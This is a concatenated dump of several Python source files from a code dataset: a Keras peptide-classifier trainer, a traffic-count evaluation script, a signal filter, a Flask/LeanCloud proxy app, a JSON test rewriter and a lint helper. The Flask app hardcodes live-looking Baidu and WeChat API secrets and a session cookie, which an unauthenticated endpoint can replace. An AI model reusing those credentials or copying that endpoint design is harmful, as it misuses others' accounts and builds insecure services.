20, strides = 1,activation = 'relu', padding=\"same\")(input_)\n norm = BatchNormalization()(cnn)\n MaxPool = MaxPool1D(pool_size=2, strides=1, padding='same')(norm)\n drop = Dropout(0.25)(MaxPool)\n \n cnn2 = Conv1D(filters = 32, kernel_size = 20, strides = 1,activation = 'relu', padding=\"same\")(drop)\n norm2 = BatchNormalization()(cnn2)\n MaxPool2 = MaxPool1D(pool_size=2, strides=1, padding='same')(norm2)\n drop = Dropout(0.25)(MaxPool2)\n \n cnn3 = Conv1D(filters = 8, kernel_size = 20, strides = 1,activation = 'relu', padding=\"same\")(drop)\n norm3 = BatchNormalization()(cnn3)\n MaxPool3 = MaxPool1D(pool_size=2, strides=1, padding='same')(norm3)\n drop = Dropout(0.25)(MaxPool3)\n\n Flat = Flatten()(drop)\n Den = Dense(128, activation = \"relu\")(Flat)\n drop = Dropout(0.5)(Den)\n result = Dense(1, activation = \"sigmoid\" ,kernel_regularizer= L2(0.01),activity_regularizer= L2(0.01))(drop)\n model = Model(inputs=input_,outputs=result)\n\n 
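    # Shape bookkeeping at this point in the graph (descriptive note, with the
    # sizes taken from the code above): PC_6(..., length=50) encodes each peptide
    # as a 50x6 matrix (50 residues, 6 physico-chemical properties per residue),
    # matching Input(shape=(50,6)). Each Conv1D/MaxPool1D block uses stride 1
    # with padding='same', so the length-50 axis is preserved throughout, and
    # Flatten() hands 50*8 = 400 features to the Dense(128) head. Calling
    # model.summary() here would confirm these shapes before compiling.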
model.compile(optimizer=optimizers.Adam(lr=1e-4),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n e_s = tensorflow.keras.callbacks.EarlyStopping(monitor='val_loss',\n min_delta=0,\n patience=100,\n verbose=0, mode='min')\n best_weights_filepath = path+'/%s_best_weights.h5'%model_name\n saveBestModel = tensorflow.keras.callbacks.ModelCheckpoint(best_weights_filepath, \n monitor='val_loss', \n verbose=1, \n save_best_only=True, \n mode='auto')\n CSVLogger = tensorflow.keras.callbacks.CSVLogger(path+\"/%s_csvLogger.csv\"%model_name,separator=',', append=False)\n\n t_m=model.fit(train_data,train_label,shuffle=True,validation_split=0.1, \n epochs=500, batch_size=int(0.1*len(train_data)),callbacks=[saveBestModel,CSVLogger])\n return model,t_m\n\n\n# training model\nmodel, t_m = t_m(x,y,'PC_6_model_ACP4db_final', path='/home/yysun0116/ACPs/PC6/')\n\n\n\n# show the model training process\nfrom sklearn.metrics import accuracy_score,accuracy_score,f1_score,matthews_corrcoef,confusion_matrix,roc_curve,auc\nimport matplotlib.pyplot as plt\ndef show_train_history(train_history,train,validation):\n plt.plot(train_history.history[train])\n plt.plot(train_history.history[validation])\n plt.title('Train History')\n plt.ylabel(train)\n plt.xlabel('Epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n\nshow_train_history(t_m ,'accuracy','val_accuracy')\nshow_train_history(t_m ,'loss','val_loss')","sub_path":"code/ACPs_PC6_training.py","file_name":"ACPs_PC6_training.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"121210574","text":"import pandas as pd\nimport numpy as np\n\n# column headers of detection file\ncol_list = ['frameNumber', 'tracks_entering_interval', 'tracks_entering_total',\n 'tracks_exiting_interval','tracks_exiting_total',\n 'trackId', 'rectsSize', 'attribRectsSize', 'confClassId',\n 'countedAs', 'trackCrossingStatus', 'bordersSize', 'attribRectsX',\n 'attribRectsY', 'attribRectsWidth','attribRectsHeight',\n 'border_0_crossingStatus', 'border_0_areaChange',\n 'border_0_touchesBorder', 'border_0_percentArea']\n\n# path to detection file\nfile_path = '/Users/wendyzhang/Downloads/detections_bei_release_4.csv'\n\ndf = pd.read_csv(file_path, usecols=col_list, low_memory=False,\n error_bad_lines=False, index_col=False, dtype='unicode')\n\n# list of indices of repetitive row entries that need to be removed from\n# dataframe\nrows_to_remove = []\n\n# dictionary of pairs, indicating frames whose total entering count need to be\n# updated after removal (max value is selected for mutiple entries)\nenter_update = {}\nlast_frame = 'a'\nlast_enter = 0\nlast_exit = 0\n\n# determines rows to be deleted, and leaves rows to be updated after deletion\nfor index, row in df.iterrows():\n if row['frameNumber'] == last_frame:\n if row['tracks_exiting_total'] > last_exit:\n if row['tracks_entering_total'] >= last_enter:\n rows_to_remove.append(index - 1)\n else:\n enter_update[row['frameNumber']] = last_enter\n rows_to_remove.append(index - 1)\n last_frame = row['frameNumber']\n last_enter = row['tracks_entering_total']\n last_exit = row['tracks_exiting_total']\n else:\n rows_to_remove.append(index)\n if row['tracks_entering_total'] > last_enter:\n enter_update[row['frameNumber']] = row['tracks_entering_total']\n last_frame = row['frameNumber']\n last_enter = row['tracks_entering_total']\n last_exit = row['tracks_exiting_total']\n else:\n last_frame = row['frameNumber']\n last_enter 
= row['tracks_entering_total']\n last_exit = row['tracks_exiting_total']\n\n# contains unique frames only\nmodified_df = df.drop(rows_to_remove)\n\n# update entering count to maximum for specific frame\nfor key in enter_update:\n frame = key\n total_enter = enter_update[key]\n modified_df.loc[modified_df['frameNumber'] == frame,\n 'tracks_entering_total'] = total_enter\n\nnew_file = '/Users/wendyzhang/Documents/reduced_bei_release_4.csv'\n\nmodified_df.reset_index(inplace=True)\n\nmodified_df.to_csv(new_file)\n\ncounts = modified_df[[\"tracks_entering_total\", \"tracks_exiting_total\"]].to_numpy()\ntotal_counts_per_minute = counts[::1500,:]\ntotal_counts_per_minute = np.array([list(map(int, i)) for i in\n total_counts_per_minute])\n\nper_minute_counts = np.diff(total_counts_per_minute.transpose())\n\n# read file with ground truth data to dataframe\ngt_df = pd.read_csv('/Users/wendyzhang/Documents/bei_gt.csv',\n usecols=['Interval', 'Entering', 'Exiting'],\n low_memory=False)\n\nmy_counts = gt_df[['Entering', 'Exiting']].to_numpy()\n\ngt_counts_per_minute = my_counts.transpose()\n\ndf_counts = pd.DataFrame(np.array(per_minute_counts.transpose()),\n columns=['Entering', 'Exiting'])\n\ndf_counts.to_csv('/Users/wendyzhang/Documents/bei_release_4_counts.csv')\n\n# list of intervals by minute\nintervals = gt_df['Interval'].tolist()\n\ndf_counts.insert(0, 'Interval', intervals, True)\n\n# calculate average accuracy and error per minute\nmean_error_per_minute = np.mean(abs(gt_counts_per_minute - per_minute_counts) /\n np.add(gt_counts_per_minute,1e-15),axis = 1)\nmean_accuracy_per_minute = (1 - mean_error_per_minute) * 100\n\nprint(mean_error_per_minute)\nprint(mean_accuracy_per_minute)\n\n\n\n\n\n\n","sub_path":"per_minute_evaluation.py","file_name":"per_minute_evaluation.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"467995752","text":"import numpy as np\n\n\nclass SFilter:\n\tdef __init__(self):\n\t\tself.M = 2\n\t\tself.prevValues = np.zeros(self.M)\n\t\treturn\n\n\tdef getOutput(self, x):\n\t\t# Le aplica una Transferencia de H(z)=1/(1+gz^-M)\n\n\t\ty = np.ndarray(len(x))\n\t\tg = 0.5\n\t\ty_tot = np.append(self.prevValues, np.ndarray(len(x)))\n\n\t\tfor n in range(len(x)):\n\t\t\ty[n] = x[n] - g * y_tot[n] - 0.3 * y_tot[n + 1]\n\t\t\ty_tot[n+self.M] = y[n]\n\t\tfor i in range(self.M):\n\t\t\tself.prevValues[i] = y[len(y) - self.M + i]\n\t\t# Si tengo y=[y1,y2,y3,y4,...,y10] agarro los ultimos M valores\n\t\t# pej, si M = 3 entonces prevValues=[y8,y9,y10]\n\t\treturn y\n\n\tdef resetPrevValues(self):\n\t\tself.prevValues = np.zeros(self.M)\n\t\treturn","sub_path":"Código/SFilter.py","file_name":"SFilter.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"225771648","text":"# coding: utf-8\n\nimport os\nfrom io import BytesIO\nimport os,base64\nfrom leancloud import Query\nfrom leancloud import Object\nfrom flask import Flask\nfrom flask import redirect\nfrom flask import url_for\nfrom flask import g\nfrom flask import request\nfrom flask import send_from_directory\nfrom flask import flash,make_response,Response \nfrom flask import Markup\nfrom flask import render_template\nfrom werkzeug import Request\nimport leancloud\nimport requests\nimport json,random\nfrom views.todos import todos_view\nfrom views.users import users_view\nfrom aip import AipImageClassify\nfrom aip import AipFace\nfrom aip 
import AipBodyAnalysis\nfrom aip import AipOcr\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '11470546'\nAPI_KEY = 'hBYWy8rqaABMrkKCdFpNqOaj'\nSECRET_KEY = 'Eox3cFvvj2oV0I6OHqufUt4b7yfdYfyK '\nclient_ocr = AipOcr(APP_ID, API_KEY, SECRET_KEY)\nclient = AipImageClassify(APP_ID, API_KEY, SECRET_KEY)\nclient_face = AipFace(APP_ID, API_KEY, SECRET_KEY)\nclient_count = AipBodyAnalysis(APP_ID, API_KEY, SECRET_KEY)\napp = Flask(__name__)\napp.config.update(dict(PREFERRED_URL_SCHEME='https'))\ntry:\n app.secret_key = bytes(os.environ.get('SECRET_KEY'), 'utf-8')\nexcept TypeError:\n import sys\n sys.exit('未检测到密钥。请在 LeanCloud 控制台 > 云引擎 > 设置中新增一个名为 SECRET_KEY 的环境变量,再重试部署。')\nglobal cookie_data\ncookie_data = \"mmsess=s%3A70opOTJ-kIHh0aI_RT3RJEOgM5xBwSZr.r2sEk%2BF%2FWID8qnVZomBfKI7U2pmmhHRYgBnzZeAaeR0\"\nclass Todo(Object):\n pass\nclass HTTPMethodOverrideMiddleware(object):\n \"\"\"\n 使用中间件以接受标准 HTTP 方法\n 详见:https://gist.github.com/nervouna/47cf9b694842134c41f59d72bd18bd6c\n \"\"\"\n\n allowed_methods = frozenset(['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'OPTIONS'])\n bodyless_methods = frozenset(['GET', 'HEAD', 'DELETE', 'OPTIONS'])\n\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n request = Request(environ)\n method = request.args.get('METHOD', '').upper()\n if method in self.allowed_methods:\n method = method.encode('ascii', 'replace')\n environ['REQUEST_METHOD'] = method\n if method in self.bodyless_methods:\n environ['CONTENT_LENGTH'] = 0\n return self.app(environ, start_response)\n\n# 注册中间件\napp.wsgi_app = HTTPMethodOverrideMiddleware(app.wsgi_app)\napp.wsgi_app = leancloud.HttpsRedirectMiddleware(app.wsgi_app)\napp.wsgi_app = leancloud.engine.CookieSessionMiddleware(app.wsgi_app, app.secret_key)\n\n# 动态路由\napp.register_blueprint(todos_view, url_prefix='/todos')\napp.register_blueprint(users_view, url_prefix='/users')\n\n\n\n\n\n\n@app.route('/')\ndef index():\n return redirect(url_for('todos.show'))\n\ndef Response_headers(content): \n resp = Response(content) \n resp.headers['Access-Control-Allow-Origin'] = '*' \n return resp \n@app.route('/help')\ndef help():\n Todo = Object.extend('Todo')\n query = Query(Todo)\n\n query.equal_to('sent', \"0\")\n gameScores = query.find()\n print (gameScores)\n \n\n \n\n return render_template('help.html')\n\n@app.route('/cookie',methods=['GET','POST'])\ndef cookie(): \n global cookie_data\n print(request.form)\n print(request.form.to_dict())\n cookie_data = request.form.to_dict()['cookie']\n print (cookie_data) \n return \"New cookie :\" + cookie_data\n\n@app.route('/count',methods=['GET','POST'])\ndef count():\n print(request.form)\n url = request.form.to_dict()['url']\n print(url)\n response = requests.get(url)\n # 将这个图片从内存中打开,然后就可以用Image的方法进行操作了\n options = {}\n options[\"show\"] = \"true\"\n \"\"\" 带参数调用人流量统计 \"\"\"\n result =client_count.bodyNum(BytesIO(response.content).read(), options)\n #print(\"Result: \"+ str(result))\n return str(result).replace(\"\\'\",\"\\\"\")\n\n\n\n@app.route('/face',methods=['GET','POST'])\ndef face():\n print(request.form)\n url = request.form.to_dict()['url']\n print(url)\n\n # 将这个图片从内存中打开,然后就可以用Image的方法进行操作了\n \"\"\" 如果有可选参数 \"\"\"\n options = {}\n options[\"face_field\"] = \"age,beauty,expression,faceshape,gender,glasses,landmark,race,quality,facetype\"\n options[\"max_face_num\"] = 5\n options[\"face_type\"] = \"LIVE\"\n \"\"\" 带参数调用人脸检测 \"\"\"\n imageType = \"URL\"\n result =client_face.detect(url,imageType,options)\n print(\"Result: \"+ str(result))\n return 
str(result).replace(\"\\'\",\"\\\"\")\n\n\n@app.route('/recog_car',methods=['GET','POST'])\ndef recog_car():\n    print(request.form)\n    url = request.form.to_dict()['url']\n    print(url)\n    response = requests.get(url) # fetch the image into memory\n    # the image can then be opened from memory and manipulated with Image's methods\n    \"\"\" optional parameters \"\"\"\n    options = {}\n    options[\"top_num\"] = 20\n    \"\"\" call vehicle recognition with the options \"\"\"\n    result = client.carDetect(BytesIO(response.content).read(), options)\n    print(result)\n    return str(result).replace(\"\\'\",\"\\\"\")\n\n@app.route('/app2',methods=['GET','POST'])\ndef app2():\n    print(request.form)\n    if request.method == 'POST': \n        # POST:\n        # request.form collects all POST parameters in a dict-like object; to_dict() converts it to a plain dict\n        # a single parameter can be read with request.form.to_dict().get(\"xxx\",\"\")\n        # ----------------------------------------------------\n        # GET:\n        # request.args collects all GET parameters in a dict-like object; to_dict() converts it to a plain dict\n        # a single parameter can be read with request.args.to_dict().get('xxx',\"\")\n        global cookie_data\n        headers={\n            'Connection': 'keep-alive',\n            'Content-Type':'application/json',\n            'Cookie': cookie_data,\n        }\n        print(\"Headers\"+str(headers))\n        print(request.form.to_dict())\n        data = str(request.form.to_dict()).replace(\"\\'\",\"\\\"\")\n        data2={\"url\":\"http://www.baihecard.com:8860/?code=Ziv36RTE7ebWBRs159CDt6QgtfcxXjALdpiPV68eCfo#/\",\"usercode\":\"Ziv36RTE7ebWBRs159CDt6QgtfcxXjALdpiPV68eCfo\",\"agentId\":\"1000003\"}\n        print(data)\n        data2 = str(data2).replace(\"\\'\",\"\\\"\")\n        print(\"Data2 :\"+data2)\n        auth = requests.post(url = 'http://www.baihecard.com:8870/wxApi/user/check',data=data2,headers= headers)\n        d = requests.post(url = 'http://www.baihecard.com:8870/wxPay/reqCardNo',data=data,headers= headers)\n        if d.text == \"PARAM ERROR\":\n            d = requests.post(url = 'http://www.baihecard.com:8870/wxApi/wxPay/tradeTest',data=data,headers= headers)\n        print(auth.text)\n        print(d.text)\n        datax = request.form\n        content = str(d.text) \n        resp = Response_headers(content) \n        return resp \n    else: \n        content = json.dumps({\"error_code\":\"1001\"}) \n        resp = Response_headers(content) \n        return resp \n\n\n@app.route('/wp-json/wp/v2/<posts>',methods=['GET','POST'])\ndef wp2(posts):\n    url = \"blog.echo.cool/wp-json/wp/v2/\"+posts\n    print(request.args)\n    request_data = \"?\"\n    for i in request.args:\n        print(i)\n        print(request.args[i])\n        request_data = request_data+i+\"=\"+request.args[i]+\"&\"\n    print(url+request_data)\n    url = \"http://\"+url+request_data\n    res = requests.get(url)\n    #print(res.text)\n    return res.text\n#https://w1109790800.leanapp.cn/wp-json/wp/v2/pages/14070\n@app.route('/wp-json/wp/v2/pages/<id_data>',methods=['GET','POST'])\ndef wppages(id_data):\n    url = \"blog.echo.cool/wp-json/wp/v2/pages/\"+id_data\n    url = \"http://\"+url\n    res = requests.get(url)\n    #print(res.text)\n    return res.text\n\n@app.route('/wp-json/wp/v2/posts/<id_data>',methods=['GET','POST'])\ndef wp3(id_data):\n    url = \"blog.echo.cool/wp-json/wp/v2/posts/\"+id_data\n    url = \"http://\"+url\n    res = requests.get(url)\n    #print(res.text)\n    return res.text\n\n@app.route('/wp-json/watch-life-net/v1/post/swipe',methods=['GET','POST'])\ndef wp4():\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/post/swipe\"\n    url = \"http://\"+url\n    res = requests.get(url)\n    # print(res.text)\n    return res.text\n#/wp-json/watch-life-net/v1/weixin/qrcodeimg /wp-json/watch-life-net/v1/weixin/getopenid\n@app.route('/wp-json/watch-life-net/v1/weixin/<func>',methods=['GET'])\ndef wp29(func):\n    print(request.form)\n    print(request.form.to_dict())\n    print(request)\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/weixin/\"+str(func)\n    url = \"http://\"+url\n    res = requests.get(url)\n    # print(res.text)\n    return res.text\n@app.route('/wp-json/watch-life-net/v1/weixin/getopenid',methods=['POST'])\ndef wp28():\n    print(request.form)\n    data = request.form\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/weixin/getopenid\"\n    url = \"http://\"+url\n    res = requests.post(url,json = data )\n    # print(res.text)\n    return res.text\n#post/like\n@app.route('/wp-json/watch-life-net/v1/post/<func>',methods=['POST'])\ndef wp391(func):\n    print(request.form)\n    data = request.form\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/post/\"+str(func)\n    url = \"http://\"+url\n    res = requests.post(url,json = data )\n    # print(res.text)\n    return res.text\n#https://w1109790800.leanapp.cn/wp-json/watch-life-net/v1/comment/add\n@app.route('/wp-json/watch-life-net/v1/comment/add',methods=['POST'])\ndef wp39():\n    print(request.form)\n    data = request.form\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/comment/add\"\n    url = \"http://\"+url\n    res = requests.post(url,json = data )\n    # print(res.text)\n    return res.text\n#http://localhost:3000/wp-json/watch-life-net/v1/weixin/qrcodeimg\n@app.route('/wp-json/watch-life-net/v1/weixin/qrcodeimg',methods=['POST'])\ndef wp38():\n    print(request.form)\n    data = request.form\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/weixin/qrcodeimg\"\n    url = \"http://\"+url\n    res = requests.post(url,json = data )\n    # print(res.text)\n    return res.text\n#http://localhost:3000/wp-json/watch-life-net/v1/post/addpageview/13628\n@app.route('/wp-json/watch-life-net/v1/post/addpageview/<id_data>',methods=['GET','POST'])\ndef wp5(id_data):\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/post/addpageview/\"+id_data\n    url = \"http://\"+url\n    res = requests.get(url)\n    # print(res.text)\n    return res.text\n#https://w1109790800.leanapp.cn/wp-content/plugins/wp-rest-api-for-app/qrcode/qrcode-14739.png\n@app.route('/wp-content/plugins/wp-rest-api-for-app/qrcode/<file>',methods=['GET','POST'])\ndef wp599(file):\n    url = \"blog.echo.cool/wp-content/plugins/wp-rest-api-for-app/qrcode/\"+file\n    url = \"http://\"+url\n    response = requests.get(url) # fetch the image into memory\n    response = Response(response.content, mimetype=\"image/jpeg\")\n    # the image can then be opened from memory and manipulated with Image's methods\n    # print(res.text)\n    \n    return response\n#http://localhost:3000/wp-json/watch-life-net/v1/options/enableComment\n@app.route('/wp-json/watch-life-net/v1/options/enableComment',methods=['GET','POST'])\ndef wp6():\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/options/enableComment\"\n    url = \"http://\"+url\n    res = requests.get(url)\n    # print(res.text)\n    return res.text\n#http://localhost:3000/wp-json/watch-life-net/v1/weixin/getopenid\n@app.route('/wp-json/watch-life-net/v1/weixin/getopenid',methods=['GET','POST'])\ndef wp7():\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/weixin/getopenid\"\n    url = \"http://\"+url\n    res = requests.get(url)\n    # print(res.text)\n    return res.text\n#http://localhost:3000/wp-json/watch-life-net/v1/comment/getcomments?postid=14748&limit=10&page=1&order=desc\n@app.route('/wp-json/watch-life-net/v1/comment/getcomments',methods=['GET','POST'])\ndef wp8():\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/comment/getcomments\"\n    print(request.args)\n    request_data = \"?\"\n    for i in request.args:\n        print(i)\n        print(request.args[i])\n        request_data = request_data+i+\"=\"+request.args[i]+\"&\"\n    print(url+request_data)\n    url = \"http://\"+url+request_data\n    res = requests.get(url)\n    #print(res.text)\n    return res.text\n#https://w1109790800.leanapp.cn/wp-json/watch-life-net/v1/post/hotpostthisyear\n@app.route('/wp-json/watch-life-net/v1/post/<parm>',methods=['GET','POST'])\ndef wp17(parm):\n    url = \"blog.echo.cool/wp-json/watch-life-net/v1/post/\"+parm\n    url = \"http://\"+url\n    res = requests.get(url)\n    # print(res.text)\n    return res.text\n\n@app.route('/robots.txt')\n@app.route('/favicon.svg')\n@app.route('/favicon.ico')\ndef static_from_root():\n    return send_from_directory(app.static_folder, request.path[1:])\ndef get_file_content(filePath):\n    with open(filePath, 'rb') as fp:\n        return fp.read()\n\n\n@app.route('/sentMSG',methods=['GET','POST'])\ndef sentMSG():\n    one_data={\n        \"TransCode\":\"030112\",\n        \"OpenId\":\"123456789\",\n        \"Body\":\"\",\n    }\n    remind_data = ['又一个新任务?别怕,只要坚持一切都能完成',]\n    res = requests.post(\"https://api.hibai.cn/api/index/index\",json = one_data)\n    res = json.loads(res.text)['Body']\n\n    for i in res:\n        remind_data.append(i['word'])\n    print(request.form.to_dict())\n    formid = request.form.to_dict()['formid']\n    openid = request.form.to_dict()['openid']\n    # skip missing or mock form ids\n    if formid is not None and formid != \"the formId is a mock one\" and openid is not None:\n        print(formid)\n        print(openid)\n        keyword1={\n            \"value\": \"完成番茄时间!\",\n        }\n        keyword2={\n            \"value\": \"今天\",\n        }\n        keyword3={\n            \"value\": remind_data[random.randint(0,len(remind_data)-1)],\n        }\n        data2={\n            \"keyword1\":keyword1,\n            \"keyword2\":keyword2,\n            \"keyword3\":keyword3,\n        }\n\n        data = {\n            \"touser\": openid,\n            \"template_id\": \"jU-T8cBTkvhQ-xCzkGP4Ef8TrfeI3qkMQ_l_ZNaP9Ik\",\n            \"page\": \"pages/index/index\",\n            \"form_id\": formid,\n            \"data\":data2,\n            \"emphasis_keyword\": \"keyword1.DATA\"\n        }\n        headers={\n            'Connection': 'keep-alive',\n            'Content-Type':'application/json',\n        }\n        print(data)\n        res = requests.get('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=wx08d8f52ad361f6e8&secret=b635b95d8bda0e8dcb8cb9a989bdc4f0')\n        access_token = json.loads(res.text)['access_token']\n        res = requests.post(\"https://api.weixin.qq.com/cgi-bin/message/wxopen/template/send?access_token=\"+access_token,json = data)\n        print(res.text)\n        return res.text\n\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"228210410","text":"import os\nimport json\nimport re\n\n\nclass Main(object):\n\n    #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec'\n    #DIR = r'C:\\dev\\projects\\idea\\product-definitions\\isda\\json'\n    #DIR = r'C:\\dev\\partial\\spec'\n    #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\Credit\\temp'\n    #DIR = r'C:\\shared\\prj\\idea\\isda-to-iso\\WEB-INF\\lib'\n    #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\InterestRate'\n    #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\Credit'\n    DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\Credit\\success'\n    #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\Credit\\temp'\n\n    def __init__(self):\n        pass\n\n    def start(self):\n        filenames = os.listdir(self.DIR)\n        for file in filenames:\n            path = os.path.join(self.DIR, file)\n            if not os.path.isfile(path):\n                continue\n\n            content = self.read_file(path)\n\n            if 'record' in content:\n                print('Skipping \\'{}\\'. 
Content already updated'.format(path))\n                continue\n\n            output_message = ''\n            for line in content.split('\\n'):\n                line = re.sub(r'//.*$', '', line)\n                output_message += '{}\\n'.format(line)\n\n            output_message = output_message.replace('\"Header\": {', '\"record\": { \"Header\": {')\n            output_message = output_message.replace('},\\n \"expected\": {', '},\"requestContext\": {}\\n},\\n \"expected\": {')\n            output_message = output_message.replace('\\n }\\n}', '\\n }, \"requestContext\": {}\\n}')\n            output_message += '}'\n\n            # JSON Prettify\n            output_message = json.dumps(json.loads(output_message), indent=4)\n\n            # Overwrite to same file\n            self.write_file(path, output_message)\n            print('Updated file \\'{}\\'.'.format(path))\n\n    @staticmethod\n    def read_file(path):\n        with open(path, 'r') as f:\n            return ''.join(f.readlines())\n\n    @staticmethod\n    def write_file(path, content):\n        with open(path, 'w') as f:\n            f.write(content)\n\n\nif __name__ == '__main__':\n    main = Main()\n    main.start()\n\n","sub_path":"Scripts/2017/ets/isda-to-iso-json-schema/json-modifier.py","file_name":"json-modifier.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"639073584","text":"#!/usr/bin/python3\r\n\r\n# build-flow.py\r\n\"\"\"Build-Flow.\r\n\r\nUsage:\r\n    BuildFlow.py lint <folder>\r\n    BuildFlow.py lint-format <folder>\r\n    BuildFlow.py lint-analyze <folder>\r\n    BuildFlow.py path <folder>\r\n    BuildFlow.py proj-create <target> <output> [BUILD]\r\n    BuildFlow.py proj-build <target>\r\n    BuildFlow.py unittest [FUNC]\r\n    BuildFlow.py (-h | --help)\r\n    BuildFlow.py (-v | --version)\r\n\r\nOptions:\r\n    -h --help     Show this screen.\r\n    -v --version  Show version.\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport platform\r\nimport unittest\r\n\r\nfrom subprocess import Popen, PIPE\r\n\r\nfrom docopt import docopt\r\n\r\n\r\nclass Utility():\r\n    def __init__(self):\r\n        self.name = \"\"\r\n\r\n    def get_devtls_path(self):\r\n        target_path = os.environ['CRDSWDEVTLS']\r\n        if target_path and os.path.exists(target_path):\r\n            return True, target_path\r\n        return False, ''\r\n\r\n    def get_devtls_tool_path_list(self, devtls_path):\r\n        if not os.path.exists(devtls_path):\r\n            return []\r\n\r\n        devtls_path = os.path.abspath(devtls_path)\r\n\r\n        path_list = []\r\n        if 'Windows' == platform.system():\r\n            if os.path.exists(os.path.join(devtls_path, '@Win32')):\r\n                path_list.append(os.path.join(\r\n                    devtls_path, '@Win32/tool/7zip/18.05'))\r\n                path_list.append(os.path.join(\r\n                    devtls_path, '@Win32/tool/cmake/3.12.2'))\r\n                path_list.append(os.path.join(\r\n                    devtls_path, '@Win32/tool/llvm/7.0.1'))\r\n                path_list.append(os.path.join(\r\n                    devtls_path, '@Win32/tool/python/3.7'))\r\n                path_list.append(os.path.join(\r\n                    devtls_path, '@Win32/tool/rclone/1.45'))\r\n\r\n        elif 'Linux' == platform.system():\r\n            if os.path.exists(os.path.join(devtls_path, '@Linux')):\r\n                print('not implement')\r\n\r\n        elif 'Darwin' == platform.system():\r\n            if os.path.exists(os.path.join(devtls_path, '@MacOS')):\r\n                print('not implement')\r\n\r\n        else:\r\n            path_list = []\r\n\r\n        return path_list\r\n\r\n    def pipe_output(self, pipe_output):\r\n        output = \"\"\r\n        regex = re.compile(r'^b[\\\"|\\'|`]([\\S|\\s|:|\\\\|\\.|\\/|\\n]*)[\\\"|\\'|`]')\r\n        pipe_string = str(pipe_output).strip()\r\n        if pipe_output and pipe_string != \"None\" and pipe_string != \"\":\r\n            match = regex.search(pipe_string)\r\n            if match:\r\n                match_result = match.group(1)\r\n                match_result = match_result.replace('\\\\r', '')\r\n                match_result = match_result.replace('\\\\\\\\', '\\\\')\r\n                if match_result:\r\n                    new_str_lines = match_result.split(\"\\\\n\")\r\n\r\n                    index = 0\r\n                    for item in new_str_lines:\r\n                        if '' == item:\r\n                            new_str_lines.pop(index)\r\n                            index -= 1\r\n                        index += 1\r\n\r\n                    for new_str in new_str_lines:\r\n                        output = output + new_str + \"\\n\"\r\n        return output\r\n\r\n    def find_files(self, root_path, ext_name_list, output_dir_list):\r\n        root_path = os.path.abspath(root_path)\r\n        for dirName, subdirList, fileList in os.walk(root_path, topdown=False):\r\n            for fname in fileList:\r\n                for extname in ext_name_list:\r\n                    if fname.endswith(extname):\r\n                        abspath = os.path.join(root_path, dirName, fname)\r\n                        normpath = os.path.normpath(abspath)\r\n                        output_dir_list.append(normpath)\r\n                        break\r\n\r\n    def is_ascii_string(self, input_string):\r\n        return all(ord(c) < 128 for c in input_string)\r\n\r\n\r\nclass Lint():\r\n    def __init__(self):\r\n        self.name = \"\"\r\n\r\n    def get_devtls_path(self):\r\n        build_flow_utility = Utility()\r\n        crdswdevtls_path = build_flow_utility.get_devtls_tool_path_list(\r\n            os.environ['CRDSWDEVTLS'])\r\n        return crdswdevtls_path\r\n\r\n    def code_reformat(self, file_path, test_mode=False):\r\n        ret_value = True\r\n        file_path = os.path.abspath(file_path)\r\n        print(file_path)\r\n\r\n        style_file = \"-style=file\"\r\n        style_llvm = \"-style=llvm\"\r\n        style_google = \"-style=google\"\r\n        style_mozilla = \"-style=mozilla\"\r\n        style_jsonfmt = \"-style=\\\"{BasedOnStyle: mozilla, IndentWidth: 8}\" + \"\\\"\"\r\n\r\n        new_env = os.environ\r\n        if test_mode:\r\n            style_target = \"-style=google\"  # For test\r\n            crdswdevtls = self.get_devtls_path()\r\n            for item in crdswdevtls:\r\n                new_env['PATH'] = new_env['PATH'] + ';' + item\r\n        else:\r\n            style_target = style_file\r\n\r\n        try:\r\n            process = Popen([\"clang-format\", \"-i\", style_target, file_path],\r\n                            stdin=PIPE, stdout=PIPE, stderr=PIPE, env=new_env)\r\n            stdout, stderr = process.communicate()\r\n\r\n            if not test_mode:\r\n                file = open(\"build-flow.log\", 'a')\r\n\r\n                stdout_str = str(stdout)\r\n                if len(stdout_str) > 5:\r\n                    file.write(stdout_str + '\\n')\r\n\r\n                stderr_str = str(stderr)\r\n                if len(stderr_str) > 5:\r\n                    file.write(stderr_str + '\\n')\r\n\r\n                file.close()\r\n        except:\r\n            ret_value = False\r\n            print(\"An exception occurred\")\r\n\r\n        return 